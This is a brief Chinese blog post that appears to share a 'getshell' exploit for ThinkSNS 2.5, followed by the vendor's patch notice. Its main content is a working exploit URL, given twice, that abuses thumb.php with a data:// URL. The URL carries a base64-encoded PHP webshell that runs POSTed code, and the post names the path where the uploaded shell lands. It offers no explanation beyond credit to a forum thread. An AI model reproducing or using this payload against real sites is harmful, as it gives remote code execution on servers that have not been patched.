Thinksns 2.5 getshell

  • A+
所属分类:漏洞时代
摘要

shell:xxx.xxxx/data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php测试。。摘自:https://t00ls.net/thread-20463-1-1.html


exp:xxx.xxxx/thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW2NdKXtldmFsKCRfUE9TVFtjXSk7fWVsc2V7cGhwaW5mbygpO30/Pg==&w=&t=.php&r=1

shell:xxx.xxxx/data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php

测试。。

Thinksns 2.5 getshell

摘自:https://t00ls.net/thread-20463-1-1.html

thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW3NiXSl7ZXZhbCgkX1BPU1Rbc2JdKTt9ZWxzZXtwaHBpbmZvKCk7fT8+&w=&t=.php&r=1

data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php

 

#ThinkSNS官方补丁#

ThinkSNS在windows上部署存在安全漏洞,缩略图程序thumb.php可以上传php文件,请各位用户尽快修复,请在社区下载补丁,解压覆盖根目录下同名文件即可。

补丁地址(任选一个):

http://t.cn/zWVVdwy

http://t.thinksns.com/index.php?app=home&mod=Widget&act=addonsRequest&id=11466&uid=10045&addon=FileUploads&hook=weibo_file_page

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: